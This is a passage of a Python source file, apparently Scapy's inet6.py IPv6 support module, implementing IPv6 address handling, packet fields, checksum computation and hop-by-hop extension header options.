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      1 #! /usr/bin/env python
      2 #############################################################################
      3 ##                                                                         ##
      4 ## inet6.py --- IPv6 support for Scapy                                     ##
      5 ##              see http://natisbad.org/IPv6/                              ##
      6 ##              for more informations                                      ##
      7 ##                                                                         ##
      8 ## Copyright (C) 2005  Guillaume Valadon <guedou (at] hongo.wide.ad.jp>         ##
      9 ##                     Arnaud Ebalard <arnaud.ebalard (at] eads.net>            ##
     10 ##                                                                         ##
     11 ## This program is free software; you can redistribute it and/or modify it ##
     12 ## under the terms of the GNU General Public License version 2 as          ##
     13 ## published by the Free Software Foundation.                              ##
     14 ##                                                                         ##
     15 ## This program is distributed in the hope that it will be useful, but     ##
     16 ## WITHOUT ANY WARRANTY; without even the implied warranty of              ##
     18 ## General Public License for more details.                                ##
     19 ##                                                                         ##
     20 #############################################################################
     22 """
     23 IPv6 (Internet Protocol v6).
     24 """
     27 from __future__ import absolute_import
     28 from __future__ import print_function
     30 from hashlib import md5
     31 import random
     32 import re
     33 import socket
     34 import struct
     35 from time import gmtime, strftime
     37 import scapy.modules.six as six
     38 from scapy.modules.six.moves import range, zip
     39 if not socket.has_ipv6:
     40     raise socket.error("can't use AF_INET6, IPv6 is disabled")
     41 if not hasattr(socket, "IPPROTO_IPV6"):
     42     # Workaround for http://bugs.python.org/issue6926
     43     socket.IPPROTO_IPV6 = 41
     44 if not hasattr(socket, "IPPROTO_IPIP"):
     45     # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
     46     socket.IPPROTO_IPIP = 4
     48 from scapy.arch import get_if_hwaddr
     49 from scapy.config import conf
     50 from scapy.base_classes import Gen
     51 from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \
     52     MTU
     53 from scapy.compat import chb, orb, raw, plain_str
     54 import scapy.consts
     55 from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \
     56     DestField, Field, FieldLenField, FlagsField, IntField, LongField, \
     57     MACField, PacketLenField, PacketListField, ShortEnumField, ShortField, \
     58     StrField, StrFixedLenField, StrLenField, X3BytesField, XBitField, \
     59     XIntField, XShortField
     60 from scapy.packet import bind_layers, Packet, Raw
     61 from scapy.volatile import RandInt, RandIP6, RandShort
     62 from scapy.sendrecv import sendp, sniff, sr, srp1
     63 from scapy.as_resolvers import AS_resolver_riswhois
     64 from scapy.supersocket import SuperSocket, L3RawSocket
     65 from scapy.utils6 import in6_6to4ExtractAddr, in6_and, in6_cidr2mask, \
     66     in6_getnsma, in6_getnsmac, in6_isaddr6to4, in6_isaddrllallnodes, \
     67     in6_isaddrllallservers, in6_isaddrTeredo, in6_isllsnmaddr, in6_ismaddr, \
     68     in6_ptop, teredoAddrExtractInfo
     69 from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP
     70 from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \
     71     UDP, UDPerror
     72 from scapy.utils import checksum, inet_pton, inet_ntop, strxor
     73 from scapy.error import warning
     74 if conf.route6 is None:
     75     # unused import, only to initialize conf.route6
     76     import scapy.route6
     79 #############################################################################
     80 # Helpers                                                                  ##
     81 #############################################################################
     83 def get_cls(name, fallback_cls):
     84     return globals().get(name, fallback_cls)
     87 ##########################
     88 ## Neighbor cache stuff ##
     89 ##########################
     91 conf.netcache.new_cache("in6_neighbor", 120)
     93 @conf.commands.register
     94 def neighsol(addr, src, iface, timeout=1, chainCC=0):
     95     """Sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address addr
     97     'src' address is used as source of the message. Message is sent on iface.
     98     By default, timeout waiting for an answer is 1 second.
    100     If no answer is gathered, None is returned. Else, the answer is
    101     returned (ethernet frame).
    102     """
    104     nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
    105     d = inet_ntop(socket.AF_INET6, nsma)
    106     dm = in6_getnsmac(nsma)
    107     p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255)
    108     p /= ICMPv6ND_NS(tgt=addr)
    109     p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
    110     res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
    111                chainCC=chainCC)
    113     return res
    115 @conf.commands.register
    116 def getmacbyip6(ip6, chainCC=0):
    117     """Returns the MAC address corresponding to an IPv6 address
    119     neighborCache.get() method is used on instantiated neighbor cache.
    120     Resolution mechanism is described in associated doc string.
    122     (chainCC parameter value ends up being passed to sending function
    123      used to perform the resolution, if needed)
    124     """
    126     if isinstance(ip6, Net6):
    127         ip6 = str(ip6)
    129     if in6_ismaddr(ip6): # Multicast
    130         mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
    131         return mac
    133     iff,a,nh = conf.route6.route(ip6)
    135     if iff == scapy.consts.LOOPBACK_INTERFACE:
    136         return "ff:ff:ff:ff:ff:ff"
    138     if nh != '::':
    139         ip6 = nh # Found next hop
    141     mac = conf.netcache.in6_neighbor.get(ip6)
    142     if mac:
    143         return mac
    145     res = neighsol(ip6, a, iff, chainCC=chainCC)
    147     if res is not None:
    148         if ICMPv6NDOptDstLLAddr in res:
    149             mac = res[ICMPv6NDOptDstLLAddr].lladdr
    150         else:
    151             mac = res.src
    152         conf.netcache.in6_neighbor[ip6] = mac
    153         return mac
    155     return None
    158 #############################################################################
    159 #############################################################################
    160 ###              IPv6 addresses manipulation routines                     ###
    161 #############################################################################
    162 #############################################################################
    164 class Net6(Gen): # syntax ex. fec0::/126
    165     """Generate a list of IPv6s from a network address or a name"""
    166     name = "ipv6"
    167     ip_regex = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")
    169     def __init__(self, net):
    170         self.repr = net
    172         tmp = net.split('/')+["128"]
    173         if not self.ip_regex.match(net):
    174             tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0]
    176         netmask = int(tmp[1])
    177         self.net = inet_pton(socket.AF_INET6, tmp[0])
    178         self.mask = in6_cidr2mask(netmask)
    179         self.plen = netmask
    181     def __iter__(self):
    183         def parse_digit(value, netmask):
    184             netmask = min(8, max(netmask, 0))
    185             value = int(value)
    186             return (value & (0xff << netmask),
    187                     (value | (0xff >> (8 - netmask))) + 1)
    189         self.parsed = [
    190             parse_digit(x, y) for x, y in zip(
    191                 struct.unpack("16B", in6_and(self.net, self.mask)),
    192                 (x - self.plen for x in range(8, 129, 8)),
    193             )
    194         ]
    196         def rec(n, l):
    197             sep = ':' if n and  n % 2 == 0 else ''
    198             if n == 16:
    199                 return l
    200             return rec(n + 1, [y + sep + '%.2x' % i
    201                                # faster than '%s%s%.2x' % (y, sep, i)
    202                                for i in range(*self.parsed[n])
    203                                for y in l])
    205         return iter(rec(0, ['']))
    207     def __str__(self):
    208         try:
    209             return next(self.__iter__())
    210         except StopIteration:
    211             return None
    213     def __eq__(self, other):
    214         return str(other) == str(self)
    216     def __ne__(self, other):
    217         return str(other) != str(self)
    219     def __repr__(self):
    220         return "Net6(%r)" % self.repr
    227 #############################################################################
    228 #############################################################################
    229 ###                              IPv6 Class                               ###
    230 #############################################################################
    231 #############################################################################
    233 class IP6Field(Field):
    234     def __init__(self, name, default):
    235         Field.__init__(self, name, default, "16s")
    236     def h2i(self, pkt, x):
    237         if isinstance(x, str):
    238             try:
    239                 x = in6_ptop(x)
    240             except socket.error:
    241                 x = Net6(x)
    242         elif isinstance(x, list):
    243             x = [Net6(a) for a in x]
    244         return x
    245     def i2m(self, pkt, x):
    246         return inet_pton(socket.AF_INET6, plain_str(x))
    247     def m2i(self, pkt, x):
    248         return inet_ntop(socket.AF_INET6, x)
    249     def any2i(self, pkt, x):
    250         return self.h2i(pkt,x)
    251     def i2repr(self, pkt, x):
    252         if x is None:
    253             return self.i2h(pkt,x)
    254         elif not isinstance(x, Net6) and not isinstance(x, list):
    255             if in6_isaddrTeredo(x):   # print Teredo info
    256                 server, _, maddr, mport = teredoAddrExtractInfo(x)
    257                 return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport)
    258             elif in6_isaddr6to4(x):   # print encapsulated address
    259                 vaddr = in6_6to4ExtractAddr(x)
    260                 return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
    261         return self.i2h(pkt, x)       # No specific information to return
    262     def randval(self):
    263         return RandIP6()
    265 class SourceIP6Field(IP6Field):
    266     __slots__ = ["dstname"]
    267     def __init__(self, name, dstname):
    268         IP6Field.__init__(self, name, None)
    269         self.dstname = dstname
    270     def i2m(self, pkt, x):
    271         if x is None:
    272             dst=getattr(pkt,self.dstname)
    273             iff,x,nh = conf.route6.route(dst)
    274         return IP6Field.i2m(self, pkt, x)
    275     def i2h(self, pkt, x):
    276         if x is None:
    277             if conf.route6 is None:
    278                 # unused import, only to initialize conf.route6
    279                 import scapy.route6
    280             dst = ("::" if self.dstname is None else getattr(pkt, self.dstname))
    281             if isinstance(dst, (Gen, list)):
    282                 r = {conf.route6.route(daddr) for daddr in dst}
    283                 if len(r) > 1:
    284                     warning("More than one possible route for %r" % (dst,))
    285                 x = min(r)[1]
    286             else:
    287                 x = conf.route6.route(dst)[1]
    288         return IP6Field.i2h(self, pkt, x)
    290 class DestIP6Field(IP6Field, DestField):
    291     bindings = {}
    292     def __init__(self, name, default):
    293         IP6Field.__init__(self, name, None)
    294         DestField.__init__(self, name, default)
    295     def i2m(self, pkt, x):
    296         if x is None:
    297             x = self.dst_from_pkt(pkt)
    298         return IP6Field.i2m(self, pkt, x)
    299     def i2h(self, pkt, x):
    300         if x is None:
    301             x = self.dst_from_pkt(pkt)
    302         return IP6Field.i2h(self, pkt, x)
    304 ipv6nh = { 0:"Hop-by-Hop Option Header",
    305            4:"IP",
    306            6:"TCP",
    307           17:"UDP",
    308           41:"IPv6",
    309           43:"Routing Header",
    310           44:"Fragment Header",
    311           47:"GRE",
    312           50:"ESP Header",
    313           51:"AH Header",
    314           58:"ICMPv6",
    315           59:"No Next Header",
    316           60:"Destination Option Header",
    317          112:"VRRP",
    318          132:"SCTP",
    319          135:"Mobility Header"}
    321 ipv6nhcls = {  0: "IPv6ExtHdrHopByHop",
    322                4: "IP",
    323                6: "TCP",
    324                17: "UDP",
    325                43: "IPv6ExtHdrRouting",
    326                44: "IPv6ExtHdrFragment",
    327               #50: "IPv6ExtHrESP",
    328               #51: "IPv6ExtHdrAH",
    329                58: "ICMPv6Unknown",
    330                59: "Raw",
    331                60: "IPv6ExtHdrDestOpt" }
    333 class IP6ListField(StrField):
    334     __slots__ = ["count_from", "length_from"]
    335     islist = 1
    336     def __init__(self, name, default, count_from=None, length_from=None):
    337         if default is None:
    338             default = []
    339         StrField.__init__(self, name, default)
    340         self.count_from = count_from
    341         self.length_from = length_from
    343     def i2len(self, pkt, i):
    344         return 16*len(i)
    346     def i2count(self, pkt, i):
    347         if isinstance(i, list):
    348             return len(i)
    349         return 0
    351     def getfield(self, pkt, s):
    352         c = l = None
    353         if self.length_from is not None:
    354             l = self.length_from(pkt)
    355         elif self.count_from is not None:
    356             c = self.count_from(pkt)
    358         lst = []
    359         ret = b""
    360         remain = s
    361         if l is not None:
    362             remain,ret = s[:l],s[l:]
    363         while remain:
    364             if c is not None:
    365                 if c <= 0:
    366                     break
    367                 c -= 1
    368             addr = inet_ntop(socket.AF_INET6, remain[:16])
    369             lst.append(addr)
    370             remain = remain[16:]
    371         return remain+ret,lst
    373     def i2m(self, pkt, x):
    374         s = b""
    375         for y in x:
    376             try:
    377                 y = inet_pton(socket.AF_INET6, y)
    378             except:
    379                 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
    380                 y = inet_pton(socket.AF_INET6, y)
    381             s += y
    382         return s
    384     def i2repr(self,pkt,x):
    385         s = []
    386         if x == None:
    387             return "[]"
    388         for y in x:
    389             s.append('%s' % y)
    390         return "[ %s ]" % (", ".join(s))
    392 class _IPv6GuessPayload:
    393     name = "Dummy class that implements guess_payload_class() for IPv6"
    394     def default_payload_class(self,p):
    395         if self.nh == 58: # ICMPv6
    396             t = orb(p[0])
    397             if len(p) > 2 and (t == 139 or t == 140): # Node Info Query
    398                 return _niquery_guesser(p)
    399             if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages
    400                 return get_cls(icmp6typescls.get(t,"Raw"), "Raw")
    401             return Raw
    402         elif self.nh == 135 and len(p) > 3: # Mobile IPv6
    403             return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
    404         elif self.nh == 43 and orb(p[2]) == 4:  # Segment Routing header
    405             return IPv6ExtHdrSegmentRouting
    406         return get_cls(ipv6nhcls.get(self.nh, "Raw"), "Raw")
    408 class IPv6(_IPv6GuessPayload, Packet, IPTools):
    409     name = "IPv6"
    410     fields_desc = [ BitField("version" , 6 , 4),
    411                     BitField("tc", 0, 8), #TODO: IPv6, ByteField ?
    412                     BitField("fl", 0, 20),
    413                     ShortField("plen", None),
    414                     ByteEnumField("nh", 59, ipv6nh),
    415                     ByteField("hlim", 64),
    416                     SourceIP6Field("src", "dst"), # dst is for src @ selection
    417                     DestIP6Field("dst", "::1") ]
    419     def route(self):
    420         dst = self.dst
    421         if isinstance(dst,Gen):
    422             dst = next(iter(dst))
    423         return conf.route6.route(dst)
    425     def mysummary(self):
    426         return "%s > %s (%i)" % (self.src, self.dst, self.nh)
    428     def post_build(self, p, pay):
    429         p += pay
    430         if self.plen is None:
    431             l = len(p) - 40
    432             p = p[:4]+struct.pack("!H", l)+p[6:]
    433         return p
    435     def extract_padding(self, s):
    436         l = self.plen
    437         return s[:l], s[l:]
    439     def hashret(self):
    440         if self.nh == 58 and isinstance(self.payload, _ICMPv6):
    441             if self.payload.type < 128:
    442                 return self.payload.payload.hashret()
    443             elif (self.payload.type in [133,134,135,136,144,145]):
    444                 return struct.pack("B", self.nh)+self.payload.hashret()
    446         if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
    447             return self.payload.hashret()
    449         nh = self.nh
    450         sd = self.dst
    451         ss = self.src
    452         if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
    453             # With routing header, the destination is the last
    454             # address of the IPv6 list if segleft > 0
    455             nh = self.payload.nh
    456             try:
    457                 sd = self.addresses[-1]
    458             except IndexError:
    459                 sd = '::1'
    460             # TODO: big bug with ICMPv6 error messages as the destination of IPerror6
    461             #       could be anything from the original list ...
    462             if 1:
    463                 sd = inet_pton(socket.AF_INET6, sd)
    464                 for a in self.addresses:
    465                     a = inet_pton(socket.AF_INET6, a)
    466                     sd = strxor(sd, a)
    467                 sd = inet_ntop(socket.AF_INET6, sd)
    469         if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):
    470             # With segment routing header (rh == 4), the destination is
    471             # the first address of the IPv6 addresses list
    472             try:
    473                 sd = self.addresses[0]
    474             except IndexError:
    475                 sd = self.dst
    477         if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
    478             nh = self.payload.nh
    480         if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
    481             nh = self.payload.nh
    483         if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
    484             foundhao = None
    485             for o in self.payload.options:
    486                 if isinstance(o, HAO):
    487                     foundhao = o
    488             if foundhao:
    489                 nh = self.payload.nh # XXX what if another extension follows ?
    490                 ss = foundhao.hoa
    492         if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
    493             sd = inet_pton(socket.AF_INET6, sd)
    494             ss = inet_pton(socket.AF_INET6, self.src)
    495             return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()
    496         else:
    497             return struct.pack("B", nh)+self.payload.hashret()
    499     def answers(self, other):
    500         if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
    501             if self.nh in [4, 41]:
    502                 return self.payload.answers(other)
    503             if isinstance(other, IPv6) and other.nh in [4, 41]:
    504                 return self.answers(other.payload)
    505             if isinstance(other, IP) and other.proto in [4, 41]:
    506                 return self.answers(other.payload)
    507         if not isinstance(other, IPv6): # self is reply, other is request
    508             return False
    509         if conf.checkIPaddr:
    510             # ss = inet_pton(socket.AF_INET6, self.src)
    511             sd = inet_pton(socket.AF_INET6, self.dst)
    512             os = inet_pton(socket.AF_INET6, other.src)
    513             od = inet_pton(socket.AF_INET6, other.dst)
    514             # request was sent to a multicast address (other.dst)
    515             # Check reply destination addr matches request source addr (i.e
    516             # sd == os) except when reply is multicasted too
    517             # XXX test mcast scope matching ?
    518             if in6_ismaddr(other.dst):
    519                 if in6_ismaddr(self.dst):
    520                     if ((od == sd) or
    521                         (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
    522                          return self.payload.answers(other.payload)
    523                     return False
    524                 if (os == sd):
    525                     return self.payload.answers(other.payload)
    526                 return False
    527             elif (sd != os): # or ss != od): <- removed for ICMP errors
    528                 return False
    529         if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
    530             # ICMPv6 Error message -> generated by IPv6 packet
    531             # Note : at the moment, we jump the ICMPv6 specific class
    532             # to call answers() method of erroneous packet (over
    533             # initial packet). There can be cases where an ICMPv6 error
    534             # class could implement a specific answers method that perform
    535             # a specific task. Currently, don't see any use ...
    536             return self.payload.payload.answers(other)
    537         elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
    538             return self.payload.answers(other.payload.payload)
    539         elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
    540             return self.payload.answers(other.payload.payload)
    541         elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
    542             return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
    543         elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):
    544             return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting
    545         elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
    546             return self.payload.payload.answers(other.payload.payload)
    547         elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance
    548             return self.payload.payload.answers(other.payload)
    549         else:
    550             if (self.nh != other.nh):
    551                 return False
    552             return self.payload.answers(other.payload)
    555 class _IPv46(IP):
    556     """
    557     This class implements a dispatcher that is used to detect the IP version
    558     while parsing Raw IP pcap files.
    559     """
    560     @classmethod
    561     def dispatch_hook(cls, _pkt=None, *_, **kargs):
    562         if _pkt:
    563             if orb(_pkt[0]) >> 4 == 6:
    564                 return IPv6
    565         elif kargs.get("version") == 6:
    566             return IPv6
    567         return IP
    570 def inet6_register_l3(l2, l3):
    571     return getmacbyip6(l3.dst)
    572 conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
    575 class IPerror6(IPv6):
    576     name = "IPv6 in ICMPv6"
    577     def answers(self, other):
    578         if not isinstance(other, IPv6):
    579             return False
    580         sd = inet_pton(socket.AF_INET6, self.dst)
    581         ss = inet_pton(socket.AF_INET6, self.src)
    582         od = inet_pton(socket.AF_INET6, other.dst)
    583         os = inet_pton(socket.AF_INET6, other.src)
    585         # Make sure that the ICMPv6 error is related to the packet scapy sent
    586         if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
    588             # find upper layer for self (possible citation)
    589             selfup = self.payload
    590             while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
    591                 selfup = selfup.payload
    593             # find upper layer for other (initial packet). Also look for RH
    594             otherup = other.payload
    595             request_has_rh = False
    596             while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
    597                 if isinstance(otherup, IPv6ExtHdrRouting):
    598                     request_has_rh = True
    599                 otherup = otherup.payload
    601             if ((ss == os and sd == od) or      # <- Basic case
    602                 (ss == os and request_has_rh)): # <- Request has a RH :
    603                                                 #    don't check dst address
    605                 # Let's deal with possible MSS Clamping
    606                 if (isinstance(selfup, TCP) and
    607                     isinstance(otherup, TCP) and
    608                     selfup.options != otherup.options): # seems clamped
    610                     # Save fields modified by MSS clamping
    611                     old_otherup_opts    = otherup.options
    612                     old_otherup_cksum   = otherup.chksum
    613                     old_otherup_dataofs = otherup.dataofs
    614                     old_selfup_opts     = selfup.options
    615                     old_selfup_cksum    = selfup.chksum
    616                     old_selfup_dataofs  = selfup.dataofs
    618                     # Nullify them
    619                     otherup.options = []
    620                     otherup.chksum  = 0
    621                     otherup.dataofs = 0
    622                     selfup.options  = []
    623                     selfup.chksum   = 0
    624                     selfup.dataofs  = 0
    626                     # Test it and save result
    627                     s1 = raw(selfup)
    628                     s2 = raw(otherup)
    629                     l = min(len(s1), len(s2))
    630                     res = s1[:l] == s2[:l]
    632                     # recall saved values
    633                     otherup.options = old_otherup_opts
    634                     otherup.chksum  = old_otherup_cksum
    635                     otherup.dataofs = old_otherup_dataofs
    636                     selfup.options  = old_selfup_opts
    637                     selfup.chksum   = old_selfup_cksum
    638                     selfup.dataofs  = old_selfup_dataofs
    640                     return res
    642                 s1 = raw(selfup)
    643                 s2 = raw(otherup)
    644                 l = min(len(s1), len(s2))
    645                 return s1[:l] == s2[:l]
    647         return False
    649     def mysummary(self):
    650         return Packet.mysummary(self)
    653 #############################################################################
    654 #############################################################################
    655 ###                 Upper Layer Checksum computation                      ###
    656 #############################################################################
    657 #############################################################################
    659 class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
    660     name = "Pseudo IPv6 Header"
    661     fields_desc = [ IP6Field("src", "::"),
    662                     IP6Field("dst", "::"),
    663                     ShortField("uplen", None),
    664                     BitField("zero", 0, 24),
    665                     ByteField("nh", 0) ]
    667 def in6_chksum(nh, u, p):
    668     """
    669     As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
    671     Performs IPv6 Upper Layer checksum computation. Provided parameters are:
    672     - 'nh' : value of upper layer protocol
    673     - 'u'  : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
    674              provided with all under layers (IPv6 and all extension headers,
    675              for example)
    676     - 'p'  : the payload of the upper layer provided as a string
    678     Functions operate by filling a pseudo header class instance (PseudoIPv6)
    679     with
    680     - Next Header value
    681     - the address of _final_ destination (if some Routing Header with non
    682     segleft field is present in underlayer classes, last address is used.)
    683     - the address of _real_ source (basically the source address of an
    684     IPv6 class instance available in the underlayer or the source address
    685     in HAO option if some Destination Option header found in underlayer
    686     includes this option).
    687     - the length is the length of provided payload string ('p')
    688     """
    690     ph6 = PseudoIPv6()
    691     ph6.nh = nh
    692     rthdr = 0
    693     hahdr = 0
    694     final_dest_addr_found = 0
    695     while u != None and not isinstance(u, IPv6):
    696         if (isinstance(u, IPv6ExtHdrRouting) and
    697             u.segleft != 0 and len(u.addresses) != 0 and
    698             final_dest_addr_found == 0):
    699             rthdr = u.addresses[-1]
    700             final_dest_addr_found = 1
    701         elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
    702             u.segleft != 0 and len(u.addresses) != 0 and
    703             final_dest_addr_found == 0):
    704             rthdr = u.addresses[0]
    705             final_dest_addr_found = 1
    706         elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
    707              isinstance(u.options[0], HAO)):
    708              hahdr  = u.options[0].hoa
    709         u = u.underlayer
    710     if u is None:
    711         warning("No IPv6 underlayer to compute checksum. Leaving null.")
    712         return 0
    713     if hahdr:
    714         ph6.src = hahdr
    715     else:
    716         ph6.src = u.src
    717     if rthdr:
    718         ph6.dst = rthdr
    719     else:
    720         ph6.dst = u.dst
    721     ph6.uplen = len(p)
    722     ph6s = raw(ph6)
    723     return checksum(ph6s+p)
    726 #############################################################################
    727 #############################################################################
    728 ###                         Extension Headers                             ###
    729 #############################################################################
    730 #############################################################################
    733 # Inherited by all extension header classes
    734 class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    735     name = 'Abstract IPV6 Option Header'
    736     aliastypes = [IPv6, IPerror6] # TODO ...
    739 #################### IPv6 options for Extension Headers #####################
    741 _hbhopts = { 0x00: "Pad1",
    742              0x01: "PadN",
    743              0x04: "Tunnel Encapsulation Limit",
    744              0x05: "Router Alert",
    745              0x06: "Quick-Start",
    746              0xc2: "Jumbo Payload",
    747              0xc9: "Home Address Option" }
    749 class _OTypeField(ByteEnumField):
    750     """
    751     Modified BytEnumField that displays information regarding the IPv6 option
    752     based on its option type value (What should be done by nodes that process
    753     the option if they do not understand it ...)
    755     It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
    756     """
    757     pol = {0x00: "00: skip",
    758            0x40: "01: discard",
    759            0x80: "10: discard+ICMP",
    760            0xC0: "11: discard+ICMP not mcast"}
    762     enroutechange = {0x00: "0: Don't change en-route",
    763                  0x20: "1: May change en-route" }
    765     def i2repr(self, pkt, x):
    766         s = self.i2s.get(x, repr(x))
    767         polstr = self.pol[(x & 0xC0)]
    768         enroutechangestr = self.enroutechange[(x & 0x20)]
    769         return "%s [%s, %s]" % (s, polstr, enroutechangestr)
    771 class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
    772     name = "Scapy6 Unknown Option"
    773     fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
    774                    FieldLenField("optlen", None, length_of="optdata", fmt="B"),
    775                    StrLenField("optdata", "",
    776                                length_from = lambda pkt: pkt.optlen) ]
    777     def alignment_delta(self, curpos): # By default, no alignment requirement
    778         """
    779         As specified in section 4.2 of RFC 2460, every options has
    780         an alignment requirement ususally expressed xn+y, meaning
    781         the Option Type must appear at an integer multiple of x octest
    782         from the start of the header, plus y octet.
    784         That function is provided the current position from the
    785         start of the header and returns required padding length.
    786         """
    787         return 0
    789 class Pad1(Packet): # IPv6 Hop-By-Hop Option
    790     name = "Pad1"
    791     fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ]
    792     def alignment_delta(self, curpos): # No alignment requirement
    793         return 0
    795 class PadN(Packet): # IPv6 Hop-By-Hop Option
    796     name = "PadN"
    797     fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
    798                    FieldLenField("optlen", None, length_of="optdata", fmt="B"),
    799                    StrLenField("optdata", "",
    800                                length_from = lambda pkt: pkt.optlen)]
    801     def alignment_delta(self, curpos): # No alignment requirement
    802         return 0
    804 class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
    805     name = "Router Alert"
    806     fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
    807                    ByteField("optlen", 2),
    808                    ShortEnumField("value", None,
    809                                   { 0: "Datagram contains a MLD message",
    810                                     1: "Datagram contains RSVP message",
    811                                     2: "Datagram contains an Active Network message",
    812                                    68: "NSIS NATFW NSLP",
    813                                    69: "MPLS OAM",
    814                                 65535: "Reserved" })]
    815     # TODO : Check IANA has not defined new values for value field of RouterAlertOption
    816     # TODO : Now that we have that option, we should do something in MLD class that need it
    817     # TODO : IANA has defined ranges of values which can't be easily represented here.
    818     #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
    819     def alignment_delta(self, curpos): # alignment requirement : 2n+0
    820         x = 2 ; y = 0
    821         delta = x*((curpos - y + x - 1)//x) + y - curpos
    822         return delta
    824 class Jumbo(Packet): # IPv6 Hop-By-Hop Option
    825     name = "Jumbo Payload"
    826     fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
    827                    ByteField("optlen", 4),
    828                    IntField("jumboplen", None) ]
    829     def alignment_delta(self, curpos): # alignment requirement : 4n+2
    830         x = 4 ; y = 2
    831         delta = x*((curpos - y + x - 1)//x) + y - curpos
    832         return delta
    834 class HAO(Packet): # IPv6 Destination Options Header Option
    835     name = "Home Address Option"
    836     fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
    837                    ByteField("optlen", 16),
    838                    IP6Field("hoa", "::") ]
    839     def alignment_delta(self, curpos): # alignment requirement : 8n+6
    840         x = 8 ; y = 6
    841         delta = x*((curpos - y + x - 1)//x) + y - curpos
    842         return delta
    844 _hbhoptcls = { 0x00: Pad1,
    845                0x01: PadN,
    846                0x05: RouterAlert,
    847                0xC2: Jumbo,
    848                0xC9: HAO }
    851 ######################## Hop-by-Hop Extension Header ########################
    853 class _HopByHopOptionsField(PacketListField):
    854     __slots__ = ["curpos"]
    855     def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
    856         self.curpos = curpos
    857         PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
    859     def i2len(self, pkt, i):
    860         l = len(self.i2m(pkt, i))
    861         return l
    863     def i2count(self, pkt, i):
    864         if isinstance(i, list):
    865             return len(i)
    866         return 0
    868     def getfield(self, pkt, s):
    869         c = l = None
    870         if self.length_from is not None:
    871             l = self.length_from(pkt)
    872         elif self.count_from is not None:
    873             c = self.count_from(pkt)
    875         opt = []
    876         ret = b""
    877         x = s
    878         if l is not None:
    879             x,ret = s[:l],s[l:]
    880         while x:
    881             if c is not None:
    882                 if c <= 0:
    883                     break
    884                 c -= 1
    885             o = orb(x[0]) # Option type
    886             cls = self.cls
    887             if o in _hbhoptcls:
    888                 cls = _hbhoptcls[o]
    889             try:
    890                 op = cls(x)
    891             except:
    892                 op = self.cls(x)
    893             opt.append(op)
    894             if isinstance(op.payload, conf.raw_layer):
    895                 x = op.payload.load
    896                 del(op.payload)
    897             else:
    898                 x = b""
    899         return x+ret,opt
    901     def i2m(self, pkt, x):
    902         autopad = None
    903         try:
    904             autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
    905         except:
    906             autopad = 1
    908         if not autopad:
    909             return b"".join(map(str, x))
    911         curpos = self.curpos
    912         s = b""
    913         for p in x:
    914             d = p.alignment_delta(curpos)
    915             curpos += d
    916             if d == 1:
    917                 s += raw(Pad1())
    918             elif d != 0:
    919                 s += raw(PadN(optdata=b'\x00'*(d-2)))
    920             pstr = raw(p)
